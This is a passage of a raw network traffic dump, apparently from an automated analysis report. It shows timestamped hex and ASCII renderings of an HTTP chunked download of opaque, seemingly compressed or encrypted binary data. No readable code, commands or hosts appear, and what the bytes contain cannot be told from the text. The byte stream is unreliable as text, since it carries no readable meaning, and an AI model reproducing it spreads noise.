                                                                                                                                                                                    Data Ascii: 2000yE7dnr],4#0W!A7=$hi45^=G=}w(Ygs5nI<[`Y@4nB>U<_3AXn8ik%dCB$\Op^b5'WZ(RmWEXre') !{Q&$0-,WEA|
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15793INData Raw: 71 aa 1e ce 0b b5
                                                                                                                                                                                    Data Ascii: q
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15793INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15793INData Raw: 32 30 30 30 0d 0a f3 16 56 52 eb c3 df be 43 ee 62 c6 23 23 bf aa 97 1e eb 77 ce b3 54 ba c1 f1 d7 29 c0 fb ea cc 5d 7a 8f e3 cc 93 39 fc 33 44 f8 ea 51 db a7 30 01 0c 4a ac 1f 29 2d d9 b2 60 65 c3 7e d8 4e 1a be f0 2a 1c 0e 63 39 89 a1 4d 1a 80 92 e7 a9 57 3c c6 05 52 80 8d 9e 40 27 2b f7 4c 43 e9 20 ae 6e dc 52 6a 6a 07 12 e3 5f 33 b5 e2 99 1f 6e 06 ef 9c 1c 86 76 cb 46 79 8b c3 1b 1b a4 9c c8 d0 63 d6 35 f9 56 f3 5f f4 d6 11 d2 45 1d 1b a0 57 83 c0 91 0c 8d 19 de 7c 68 96 7f 7f 69 ff 7f 6e 24 9f fd 5b 89 ed 9f b9 23 7d 7f 2c 0b a4 eb 39 82 d5 85 c6 f2 06 2b 02 48 9c 05 76 d1 1c 4a de 0e c1 b0 ff 0f 66 ca f6 47 1d d1 c6 49 44 66 91 38 b6 35 68 c1 98 0f 0b ca ff 82 fc 4d 6d 44 dc b4 95 b2 6c 5e e2 a8 92 a2 9d 3b 5c c4 aa 97 3d 76 ca 70 dc 6a 75 e7 b6 29
                                                                                                                                                                                    Data Ascii: 2000VRCb##wT)]z93DQ0J)-`e~N*c9MW<R@'+LC nRjj_3nvFyc5V_EW|hin$[#},9+HvJfGIDf85hMmDl^;\=vpju)
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15801INData Raw: d3 e1 22 79 3a 9b
                                                                                                                                                                                    Data Ascii: "y:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15801INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15801INData Raw: 31 66 66 38 0d 0a 93 e1 48 8b 64 a5 00 28 3c 14 df a8 81 5b 39 93 7c ab 33 ef 84 e5 65 b7 bb 14 0c 18 e2 c6 94 3a de 02 9e 1c 5c 89 24 6c 90 70 72 50 af 4a d0 7e 9e 1e ab 04 67 26 36 c5 ca 06 02 73 f3 9c 5e 6b 2f 5a b0 74 32 14 26 3f c3 f7 77 cc ee 8b 6f 1c 5b 7e 82 9a 46 8f 4a ec 00 b0 18 04 58 5a bb 88 13 e6 88 af d3 1c e8 94 cc 9f 43 73 5c 92 9f d0 36 69 24 3a 87 20 88 e9 05 f6 80 f1 1c df 5b 38 b4 a0 9c 97 7e bb fc ec 9b 8d ae 95 a1 24 16 28 de 21 0f bd aa 86 3f ad 06 85 97 37 ed 0d d8 3b b3 d4 4b e9 bf a1 09 36 38 22 25 2e 88 2a 79 c2 3e 74 f9 cc 14 49 e8 b7 7b ac 63 73 f7 78 24 b8 bc e2 c2 42 c9 33 53 6b fd 11 47 90 28 84 ad a4 98 e5 2f 80 25 f0 8c b1 d1 3e ab 6c f7 9e 08 8a c9 67 a2 a4 89 e4 ac 30 f7 b5 95 59 31 d1 4d d0 99 e7 f8 90 8b 3a 9a 64 fb
                                                                                                                                                                                    Data Ascii: 1ff8Hd(<[9|3e:\$lprPJ~g&6s^k/Zt2&?wo[~FJXZCs\6i$: [8~$(!?7;K68"%.*y>tI{csx$B3SkG(/%>lg0Y1M:d
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15809INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15809INData Raw: 13 2e b5 84 2e 77 62 a4 ce a8 b3 a6 b6 9b a4 53 1a 9e a6 af 9d 6b 12 f4 e0 ce e3 2f 9a fc a2 59 76 f5 34 4c ac 6e ad 39 84 eb ac 15 ad fe 84 04 1d ee 84 07 9a 47 fe f9 62 33 db cd 33 b4 59 ed aa ee 57 a2 02 38 86 1b 7e 75 ce 64 37 34 79 8d d3 f2 d3 fd ee e1 7a 10 2f 8e e9 dd a5 f4 2e 80 de 65 73 3d 70 63 d3 da a8 80 9e 2e f4 1e 9f e4 1b 9d 7d db 0c 24 f0 93 33 e5 01 d0 04 88 61 39 cb f8 82 8a d7 a3 b6 37 f0 ed 78 67 00 ce 43 9e 86 4e 08 ae 5f 8f df 76 da c0 a9 39 9f d3 b6 c8 2b b6 2a 2c 9a bc e4 bd ed 1c e8 49 74 96 6e 3e b2 f0 7a 3c d6 be 5e b0 c8 aa 27 90 29 b0 53 91 c2 b7 c0 9c a2 5a 99 b5 bf 71 e0 75 85 4a a1 da ca 4d c7 61 8f dd bf 80 33 1b 2b 86 92 0a 4a b1 b3 fa ca 0d 39 4e d0 3f 5d f3 16 47 33 87 dc d2 b5 96 e1 9f 0d 8a 94 8a 5d b9 7c d2 d7 24 21
                                                                                                                                                                                    Data Ascii: ..wbSk/Yv4Ln9Gb33YW8~ud74yz/.es=pc.}$3a97xgCN_v9+*,Itn>z<^')SZquJMa3+J9N?]G3]|$!
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15817INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15817INData Raw: 32 30 30 30 0d 0a f5 0f f0 d7 bd fd 54 e4 63 ef 14 0e c0 fb fe 6a 90 ee a6 59 8d d3 d0 cc 2d 2b a9 b0 8e 74 97 bf 0d 39 1e 33 53 c6 85 af cc 60 d6 32 76 1c fa 9e 9f 0f e8 26 e7 37 8c 9c da 22 30 2f 4e 74 d4 e9 13 28 6f ea c2 69 ac 06 09 2a 8a 4e aa 87 f8 a0 71 3f d3 c5 6f 22 16 3a 68 02 2b 55 7f 55 6f b6 77 03 d3 67 1e 16 ee e1 be 18 92 7e 21 88 a5 d9 f9 72 87 fa ce 19 62 0f a0 19 b6 91 96 59 72 ea 14 a8 c8 d0 48 e1 57 6d 41 f3 6a 69 18 5b 98 23 f9 08 26 cf 89 fd 2d 3e 74 5f be 54 f2 84 41 1c 09 68 df f2 bc 35 af c0 95 43 61 93 a0 58 24 be 3d 65 03 b5 42 fd af ed e5 3d fd 8c e4 c4 2e ac a2 ce 86 b7 52 62 e6 0f 42 1b 2a fb 07 72 60 37 b5 b6 3e 11 a8 f5 c6 21 84 ab 1a ef aa 11 4e c7 c0 1b b3 e2 77 8e 5d 95 93 b2 be 4c e0 ec 4e bb de f9 6c 2e 7f 87 aa 61 d6
                                                                                                                                                                                    Data Ascii: 2000TcjY-+t93S`2v&7"0/Nt(oi*Nq?o":h+UUowg~!rbYrHWmAji[#&->t_TAh5CaX$=eB=.RbB*r`7>!Nw]LNl.a
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15825INData Raw: 57 c2 d8 77 14 eb
                                                                                                                                                                                    Data Ascii: Ww
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15825INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15825INData Raw: 32 30 30 30 0d 0a 6f 0a 86 de 93 be d5 24 49 d7 b3 a9 0b fe 56 5a c1 dd 42 b6 53 49 15 80 83 5f 41 20 7a ab 66 4b 48 9b 06 ec 2c a2 5b b2 0c 51 83 e5 0c aa d5 0e 98 57 39 cc 48 73 23 1c 1b 38 a5 2a 54 e3 ef eb 99 e6 b7 93 4b cf ea 00 16 0f aa 67 9a 7b a1 39 e7 4f 22 70 97 25 86 87 5b 75 b4 ce 1d fb 56 c5 42 49 ea 3f 89 4e 70 79 ea a8 b4 fc 3a 00 b9 0c f6 29 b6 75 7b 37 5b 62 f5 97 8e a6 db cc 4f db e7 77 e0 a2 f9 9a 0f 09 a7 0f 16 96 8f 2f 12 51 39 87 9b 01 64 b9 e4 ed 71 fb 3d 66 51 7a cf 2f 28 9e 71 e3 ba 2e 9d 8a 7b 62 2d 4c df 9c b0 e0 ea c9 84 83 39 d5 f5 a0 9b bc cf 05 ac 4c c3 ed ea 87 df 3b c8 da 4e 0d e2 1b f8 a4 cc 2d 29 1a 23 56 96 b6 d8 8c 0a 8f c9 b9 0d 77 b2 73 86 8c f5 15 d1 3b 50 d2 c2 8a 11 bb 5f 26 e8 43 fc 6a 7c a7 ae 47 73 85 c2 94 6a
                                                                                                                                                                                    Data Ascii: 2000o$IVZBSI_A zfKH,[QW9Hs#8*TKg{9O"p%[uVBI?Npy:)u{7[bOw/Q9dq=fQz/(q.{b-L9L;N-)#Vws;P_&Cj|Gsj
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15833INData Raw: 88 32 af 95 62 04
                                                                                                                                                                                    Data Ascii: 2b
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15833INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15833INData Raw: 32 30 30 30 0d 0a 67 14 8f c1 04 8a 76 c2 a2 3b 18 ba 04 ff c9 45 d3 3c 6a 8c 46 41 aa ab 15 3e 6b 25 e8 00 e4 07 73 d9 28 7c bf fa f4 fb eb 2a a9 3f 21 05 1c bf d2 70 3f e9 15 3e fd 95 b7 19 ff 75 12 78 0e 51 9d 71 e9 ac e8 eb 3f b4 33 d8 68 18 bf a8 48 71 a6 5b dd f4 62 d4 2d 0d 92 11 8e dc 2d 68 51 7a 34 f7 f4 4e 14 06 0f 98 80 8a b5 bd 1e e1 a0 ed 92 09 ee 46 bc 94 ce 98 7e b9 d6 77 54 54 0c 45 f5 ad 40 75 70 f5 7a bd e2 ea 57 31 f2 17 9a 9e 2d af f8 cc 22 55 b4 3f 42 0d 01 f2 75 12 fb 70 bd 83 64 3f 7f 8e d2 88 60 4b 9d 8f 5f aa 84 94 95 32 f0 79 48 a0 26 8a 62 27 f3 0d 83 a0 4c d4 34 76 34 1a fd a6 29 33 a0 18 dd d8 d9 6f 29 43 dc 4a 04 03 b5 61 b6 24 6d cd 1c f0 56 1d 53 67 ad 45 54 b1 40 d8 48 b4 83 48 8e 2e 5a 0a 81 80 02 0b 29 64 af 22 a7 7b 1d
                                                                                                                                                                                    Data Ascii: 2000gv;E<jFA>k%s(|*?!p?>uxQq?3hHq[b--hQz4NF~wTTE@upzW1-"U?Bupd?`K_2yH&b'L4v4)3o)CJa$mVSgET@HH.Z)d"{
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15841INData Raw: 0c 1d 0b c1 75 82
                                                                                                                                                                                    Data Ascii: u
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15841INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15841INData Raw: 32 30 30 30 0d 0a 66 6f ab 64 58 b9 0c 32 73 4e 73 87 9e 6e 04 79 dd 62 44 57 06 d4 1f e2 8d 27 36 33 aa 82 73 64 c8 05 7f 78 c8 a7 e0 bd 18 10 98 67 09 cb c2 8c 00 d2 c2 6e bb 34 88 81 08 4c 6a 23 24 10 5b 72 60 eb dd 3b 6a f0 d3 91 70 dd f5 74 8e 59 64 82 85 37 a3 e0 c5 42 7f e4 b2 c9 43 16 36 b0 1d e7 c9 86 9d ed bd 57 38 ff ce f4 1d 24 a9 86 03 e9 a5 fb cd c1 f1 16 38 f6 95 2a 49 50 d6 bc 7c 70 46 23 01 0c eb 90 31 11 16 2a 81 7b 16 ae 93 2e ba 2e a8 25 99 5b 57 87 e3 c4 5a d8 02 77 73 f4 21 77 75 cb 80 1a a7 77 e3 bc ba 42 15 07 f5 48 6b 3f 81 68 54 b7 15 71 e4 31 fa 2f 12 93 f9 a7 b1 1a 86 e2 8c 2d 4b e8 5d 91 53 97 4b 69 83 ea dc bb ff 33 0d d4 b2 64 37 63 68 b4 6b 11 a9 7e af 96 3e c2 4e 32 b8 fa 10 35 7f 21 d8 a1 e9 c8 b2 46 97 51 b3 65 2b 78 ff
                                                                                                                                                                                    Data Ascii: 2000fodX2sNsnybDW'63sdxgn4Lj#$[r`;jptYd7BC6W8$8*IP|pF#1*{..%[WZws!wuwBHk?hTq1/-K]SKi3d7chk~>N25!FQe+x
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15849INData Raw: 27 b9 07 f1 33 d0
                                                                                                                                                                                    Data Ascii: '3
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15849INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15849INData Raw: 32 30 30 30 0d 0a 90 2d 00 fe 5a ad 85 2b e6 33 24 b3 e4 8c 71 a6 28 ed 36 dc 1d 63 fe a2 a1 09 bb 88 53 c8 f2 9b 95 0b 98 f9 c0 55 d3 73 40 8f ef c3 a4 fd 0b f2 a2 9d 76 0d 76 c0 cc 21 09 8d 92 51 f7 ba 92 c7 88 9a df 51 01 d6 cf 2c e5 cc 28 6e 6e bb 3a bc 8d 22 a7 13 d4 ae ef bb 09 78 2b 1b cc 41 27 e2 23 a9 2d 9d f7 33 08 2f 1d 8c e6 00 12 8c 28 0c fb 4a 9f 39 94 e4 b6 29 b2 72 9c 54 d7 6b 65 e4 17 dc 80 c5 c3 3a 77 35 f6 e7 34 20 e1 a1 08 ec 42 7b 70 dc e9 1a eb f4 13 73 b8 d0 2a 3d 84 98 13 fc b4 93 00 ab c5 a7 a0 52 15 37 3b 62 29 c5 5a 7d 85 ed 21 d3 5b 74 de 99 f6 56 8d 42 44 cd c1 5e ad c3 4f fc 6f fc 98 0c 1e 8e 33 4f 3b 62 fd 20 fb a8 f2 f1 ce a3 dc a1 95 cd 5b b0 75 57 8a 91 b7 03 ac 2d ac 52 9e 94 5c be 04 7c 0d 06 be 26 18 8b 8d 31 c4 2d 1b
                                                                                                                                                                                    Data Ascii: 2000-Z+3$q(6cSUs@vv!QQ,(nn:"x+A'#-3/(J9)rTke:w54 B{ps*=R7;b)Z}![tVBD^Oo3O;b [uW-R\|&1-
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15857INData Raw: 6b 32 2d 15 ec 19
                                                                                                                                                                                    Data Ascii: k2-
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15857INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15857INData Raw: 32 30 30 30 0d 0a b2 c3 b7 b2 76 8e 57 60 bf 42 47 61 06 27 6b a0 9f 5b fd 04 a4 c1 50 d8 d3 d3 21 74 7e 9b 59 df 4b 15 5b a8 3d 5c 66 70 0f ee c1 b8 e2 f2 e7 79 f2 ae 67 ad c5 8b 2c fe a3 88 38 9d 7f 45 2b 0c 8a 9c fc 8e 7f f0 39 37 62 1e 2d f7 e5 62 e6 44 94 32 ec 0b 1c 44 d2 74 98 be d8 10 a3 4c 40 50 28 eb 4a e7 3f 4e b2 fc 20 66 5b f3 15 f8 b5 65 b5 70 33 1b dd e7 d0 97 8e 18 fc 63 a4 01 07 0c 6f d2 02 bf 4f f5 2d cc 78 8f 69 d7 35 97 a0 76 f8 18 72 89 fe 08 cf 24 0c 01 29 a0 7e 5c 85 61 ae ba be 83 87 9f de 79 0f ff 1f 5e 0c a2 34 69 4e cb 6a 24 dc ed cd e2 29 48 06 4d f3 7d 14 c8 d1 85 17 b0 9d 2a b7 f7 5c 9f 3b bc 0f 3e 2a 1b aa 4d ca 12 ec 9e 02 ea 39 a8 1e ff a7 ca 85 46 a1 3a 7e f4 f1 b6 b1 db 78 14 8a 45 1b 77 16 60 16 93 ff 37 c0 58 d5 64 75
                                                                                                                                                                                    Data Ascii: 2000vW`BGa'k[P!t~YK[=\fpyg,8E+97b-bD2DtL@P(J?N f[ep3coO-xi5vr$)~\ay^4iNj$)HM}*\;>*M9F:~xEw`7Xdu
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15865INData Raw: 69 26 81 fa fc 83
                                                                                                                                                                                    Data Ascii: i&
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15865INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15865INData Raw: 31 66 66 38 0d 0a 56 9d ad 2d af ea 24 1d b4 8a e6 ea 11 7d f8 4c 45 8f ae de 85 f6 a8 18 03 8e c1 46 47 a9 c9 9a 1c 7b e5 70 5f 28 ab e0 ce fd 2f f0 13 8d ad 07 44 5b be e5 6a 1b c6 a9 a1 cd e9 d5 ab 60 88 c5 46 29 a0 9d 7a 9a b8 3a 59 e6 21 0c 6d 35 55 d8 91 ab b3 bf 9d d9 8d cc ca 82 cc 3d 77 23 ef 3a 3f ec 08 91 f9 49 93 69 ae c1 4d c2 ec 0b d3 10 41 40 fa bc d1 65 a2 d4 47 ff 6e 10 f0 a0 04 7f 8c a5 b3 0a a6 62 7c f9 25 6b 0b b4 04 64 6d 5b 37 e4 15 6f 4c d1 53 d6 a6 34 88 0b b4 68 be 3b f8 2c 67 8b bf ce 9b b2 5b 23 6d 4a 16 f8 03 ba 9a 12 88 d1 cd 19 06 18 b0 86 6d 6a 61 30 61 fd 57 e0 88 a5 54 2a 21 51 08 48 16 e0 eb 03 a2 80 a9 f5 9a d7 6c 10 99 a9 8e a9 a9 ce c3 77 a7 f6 0e 9a e3 87 96 c5 b1 36 5a 15 2a 1e 01 ad 3b 7e ba 24 20 2e 31 35 ca 6b c7
                                                                                                                                                                                    Data Ascii: 1ff8V-$}LEFG{p_(/D[j`F)z:Y!m5U=w#:?IiMA@eGnb|%kdm[7oLS4h;,g[#mJmja0aWT*!QHlw6Z*;~$ .15k
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15873INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15873INData Raw: bf 56 a7 2c 9f fa 35 0b b2 e4 29 ff fb 60 01 e1 ec de 50 a3 47 d6 98 7b fc b8 19 46 ca be ef cd a4 72 84 b1 13 6d 21 bf c9 0a 10 70 f7 59 a1 35 83 9d ef c3 a7 50 aa f1 91 09 1b 19 58 22 2b 6d 1a db ca b0 5a 33 da a6 77 54 69 f3 b4 b2 96 dc c9 f1 58 3f c4 01 85 a9 72 23 63 bc 38 6a 7d bc e7 69 4d c6 d4 ea 47 a3 c7 8e 4b cd a8 17 a0 45 54 e8 8e e5 e8 0a a1 90 f7 5b 9e 52 81 72 79 0b ec 88 60 1a ca 21 2a 7d 27 a7 d7 e6 c8 d1 86 59 1d d9 68 9d 8a 27 de 8c b1 68 92 04 3d d2 02 ac 5e 56 68 87 5b 7f 88 b1 41 07 b3 1c 73 53 98 f9 3e a1 ad 85 d8 89 53 c8 fc 50 e4 fa b9 ad fd a9 da ed 3b 6e 28 ed bf c8 06 90 cc 58 cf ae b1 99 40 ff eb 74 df f3 b2 4e 8b c7 ed 19 42 38 e7 e5 f2 04 d9 71 1f 50 68 1d 4d 21 89 e8 cf 3c ca 13 19 d1 27 f3 78 e0 fd d2 07 11 53 f6 65 d3 51
                                                                                                                                                                                    Data Ascii: V,5)`PG{Frm!pY5PX"+mZ3wTiX?r#c8j}iMGKET[Rry`!*}'Yh'h=^Vh[AsS>SP;n(X@tNB8qPhM!<'xSeQ
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15881INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15881INData Raw: 32 30 30 30 0d 0a 7a db aa da d2 d0 d4 88 95 f0 54 41 aa 61 ab f3 a2 6b 18 f5 3d 3e 1f ab ee 2b c2 e0 10 05 66 68 7d f6 c4 3f a1 d5 fc 34 9b cb 49 9b 7a 1e 2c 5a 95 35 a2 83 56 ab 91 06 b0 3c d3 9d fe 78 1e 48 0e 2c 2d 6d 4b 23 b1 22 92 01 d1 93 2b 73 43 b2 69 1b 51 92 99 f7 49 b0 25 f6 67 84 44 7a 8e 78 68 66 fa fd c3 28 1e 64 f5 f2 5f 5a b9 16 c3 97 f7 80 4a 87 0d 94 60 aa 58 d9 df a5 3d 45 87 42 e7 28 bf d4 24 ec a6 6d 02 4d 26 b3 04 8e d4 89 6e d2 10 4b db eb eb 65 7c 71 a6 b0 1a c3 84 ac 5a 16 73 9f 90 1c 83 91 74 a6 7a b8 59 33 56 c3 82 c9 0c 83 d0 fb 45 df ce cb a0 11 2b 0a a7 58 5c f3 76 96 76 92 03 63 56 79 40 42 41 02 61 99 3c 25 cc 9d b8 79 fa 35 74 80 91 1d 62 f6 d8 79 19 76 41 a5 3d 6b 74 5d 3d 60 a3 20 01 d0 54 cc 5f 78 30 dd fd 4a da 9d f4
                                                                                                                                                                                    Data Ascii: 2000zTAak=>+fh}?4Iz,Z5V<xH,-mK#"+sCiQI%gDzxhf(d_ZJ`X=EB($mM&nKe|qZstzY3VE+X\vvcVy@BAa<%y5tbyvA=kt]=` T_x0J
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15889INData Raw: a8 66 b2 87 49 ff
                                                                                                                                                                                    Data Ascii: fI
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15889INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15889INData Raw: 32 30 30 30 0d 0a 8e 2c d3 e5 20 9c e1 7f 6e 62 ec 6c fa c3 01 d3 a1 50 b0 5f a3 1e 0f 64 ac 1d 88 ca 09 b4 c7 84 c0 7a 15 8d be 9d 98 eb 1b 49 2a f6 e7 74 0d 80 29 f5 6e fb c9 e0 cc af f0 0b 4b 77 30 a5 9b 03 7e 88 a0 bc 12 d6 a0 e8 0c a8 84 4d a0 2c 5c 2f 89 2e e5 a0 40 4b 7b 8c 5f 59 3d 03 41 20 c2 cb 0c 35 ec c9 57 7c c9 2a 52 99 71 65 f9 50 65 30 a7 41 35 83 ca 28 3a 51 6c 86 9c a3 86 bc a4 74 28 74 21 84 83 13 5a 32 0b c6 f2 43 19 c7 07 aa de c4 6d 8b 91 ba df 29 42 91 d6 8b 1c 04 ac 56 e4 9d c5 ed f5 d7 7a 67 f4 03 a5 18 5d 02 51 63 c5 7f a4 4a 7c 77 e6 b3 d6 bc 66 3d cb 09 a4 79 9b c4 03 60 f0 fd 2e 24 7f ac d3 3f 58 f1 20 76 ff 17 77 ec 05 c1 54 37 17 ea 24 12 3a 68 f8 27 d0 4e c1 94 0b 75 e7 3f 92 d1 18 8c 4a 85 ee 7c 58 ca b0 9d 60 60 20 bb a5
                                                                                                                                                                                    Data Ascii: 2000, nblP_dzI*t)nKw0~M,\/.@K{_Y=A 5W|*RqePe0A5(:Qlt(t!Z2Cm)BVzg]QcJ|wf=y`.$?X vwT7$:h'Nu?J|X``
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15897INData Raw: 04 aa dc 6b bb ce
                                                                                                                                                                                    Data Ascii: k
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15897INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15897INData Raw: 32 30 30 30 0d 0a fe df 74 49 a8 ca 45 09 b9 da 3a d8 8e 5e 8a 4a 79 d2 92 31 dc f8 60 ca 11 32 d0 74 31 fa 9b fb 7b 01 ef c5 ad 37 e4 ef b5 77 f7 25 f8 66 14 c3 90 04 f6 7e f1 46 8b b6 e3 ab ec d4 e4 ec 09 08 6d cf 26 48 84 5c 85 24 ac 7d 0b fa 20 27 cc 07 5f 92 ed 9e e7 7f 00 d1 b2 4f d6 aa 03 bd 2a 37 c6 f7 63 66 c0 a9 2d 8f d3 9a fa 37 e7 b8 91 84 3a 20 e2 4c 73 3c 75 7b 79 94 e9 be 31 70 90 37 91 7d 0d 26 0c 7c b2 8b 71 e8 6b c4 0c 1c 93 d1 f4 6c bb 44 d5 9c 5f 10 58 b0 73 75 a8 c7 c6 93 98 f5 99 c2 3c c1 58 69 db 11 9c d1 32 be 22 00 7f 36 9c 82 25 ee c5 91 94 93 dd a9 3d 5d 77 f3 5b 5b 13 8d ad d2 ac 74 76 7d fe 8b 6a 15 6c 59 89 c6 54 e2 63 e8 dc ef 96 f0 73 98 39 7a ce 10 4e 39 e1 e8 bf 6e 17 55 f3 63 af 3a 9b e7 38 e4 d7 ec aa 77 e5 5a a7 70 8b
                                                                                                                                                                                    Data Ascii: 2000tIE:^Jy1`2t1{7w%f~Fm&H\$} '_O*7cf-7: Ls<u{y1p7}&|qklD_Xsu<Xi2"6%=]w[[tv}jlYTcs9zN9nUc:8wZp
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15905INData Raw: ff e2 ba ba 03 a1
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15905INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15905INData Raw: 32 30 30 30 0d 0a a5 35 4f 01 8d 2e 6b 0e ca 14 11 72 2e 36 02 4b bd 51 10 cf 7a d5 d5 48 0b 9a 68 ca 54 ee a3 b2 67 35 a7 ae f0 27 d6 af 6f 91 d4 4c 24 12 dd 9a 4f 5c 42 a7 2a 26 f3 7d fd 9c 52 bb 65 82 ea 15 85 8b 03 a6 74 e1 64 e1 8c 99 a4 b6 95 a8 f3 27 a9 b4 22 69 60 e7 48 96 3a 3c a2 ed 11 8e 4a 57 fd 7b 47 28 58 54 bf b6 c7 83 42 97 61 17 99 56 99 a0 36 eb e0 90 32 eb bf 53 12 f5 fe 79 62 90 49 f5 e0 32 c3 86 fe ec e9 2b 99 88 99 06 9e 09 1c dc 64 cb 41 d5 d7 99 3a 3b 56 20 f4 f9 97 59 71 a5 e1 5e 17 d9 f5 35 0e 5b e1 5d 08 72 47 ab c1 ed c8 11 6d 5f 3a e0 b9 7c 77 aa bd 44 35 47 df 73 87 09 c7 73 17 d5 1e 25 48 38 d3 8b 60 88 09 3d da 42 a3 8d 28 5b 22 52 40 f7 4a 5a d5 3e 7b 46 72 96 c8 1c 88 58 1a b8 96 1f 75 00 f1 b6 d9 0b 19 d2 95 68 94 3b b2
                                                                                                                                                                                    Data Ascii: 20005O.kr.6KQzHhTg5'oL$O\B*&}Retd'"i`H:<JW{G(XTBaV62SybI2+dA:;V Yq^5[]rGm_:|wD5Gss%H8`=B(["R@JZ>{FrXuh;
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15913INData Raw: 2b cc 46 4d 3d 09
                                                                                                                                                                                    Data Ascii: +FM=
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15913INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15913INData Raw: 32 30 30 30 0d 0a 31 de c8 27 cd 61 ae e9 d6 f6 01 f1 08 b6 95 83 9f 5b 75 53 79 ce 21 b9 53 97 75 2b 9a e5 2f 94 0b 95 89 1d 02 49 ec c9 28 0b fb db 7b de 40 d1 5a c8 f4 3f 30 a7 ed 94 56 0d 02 be 97 e2 32 2b 0e 06 f8 ee e5 a6 3e 0a 2c 6c d1 a2 11 89 48 ca 6f 0e d3 7e 99 b2 cc 03 cd 8d 83 73 c2 0b 97 46 22 df da 2c f6 d5 98 dc 6c 39 ed da 8e bb e7 ef 23 95 71 cf e6 87 44 0d 93 8d 4e 8f 9b 00 5a 46 7e 8a 72 47 2f 02 1a be 39 72 c6 4c e9 09 46 fe 03 2d f8 c6 08 53 b0 69 17 0a ae 67 55 6c 3b 4e 19 36 c3 c8 23 a7 0e 6c 2b d7 55 08 58 44 4a ef df 56 95 63 6d ad 4f 62 29 3a 98 c8 6c ba 10 5f f0 69 11 26 ba d5 24 7b 11 d7 ad ce 4a 06 3b 26 ef 12 b0 c9 bd 35 2d 4f f3 d6 26 e4 ad 4e de 57 e6 bb fc 04 56 b3 f4 31 dc 4c 5b c7 5a 2d 08 7f 50 24 f0 e4 6f 08 3b e4 cb
                                                                                                                                                                                    Data Ascii: 20001'a[uSy!Su+/I({@Z?0V2+>,lHo~sF",l9#qDNZF~rG/9rLF-SigUl;N6#l+UXDJVcmOb):l_i&${J;&5-O&NWV1L[Z-P$o;
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15921INData Raw: cf f1 7e a0 47 3a
                                                                                                                                                                                    Data Ascii: ~G:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15921INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
